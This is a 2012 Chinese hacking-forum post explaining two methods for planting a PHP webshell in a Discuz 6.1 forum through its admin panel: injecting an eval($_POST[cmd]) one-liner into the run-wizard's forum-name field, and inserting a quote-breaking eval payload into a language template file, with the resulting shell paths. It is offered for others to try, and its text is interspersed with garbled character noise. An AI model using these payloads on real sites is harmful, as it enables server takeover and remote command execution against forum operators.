找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2288|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell2 V. f7 h' n) R, h4 l# m% e
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
( l0 g) ], X3 f' j' h/ D2 }1:
4 \! `4 |* {0 [  F4 O! Chttp://127.0.0.1/discuz/admincp. ... zard&frames=yes& a0 K$ N$ E1 W( s( W5 D" Q- p
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
8 u' P' G4 O& y" ]- K5 [, e) J<?php eval($_POST[cmd]);?>6 S0 }; C* @0 b. Z+ Q
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php) b) l- V3 b- u/ F! _

0 w! n1 W2 W& b# ], c; }
' [5 H# [. W! {) A; L& P& X2:后台模板管理--默认模板套系--详情
4 t& A# s* ]& Y9 W! ttemplates/default/actions.lang.php
0 R# _  ^) p" Y1 M* b, `. cjhackj\\');eval($_POST[cmd])?>;//
' B8 W+ {9 V0 f0 F, P2 V: u( K' k9 Y% Q5 ?: Q, ]
利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表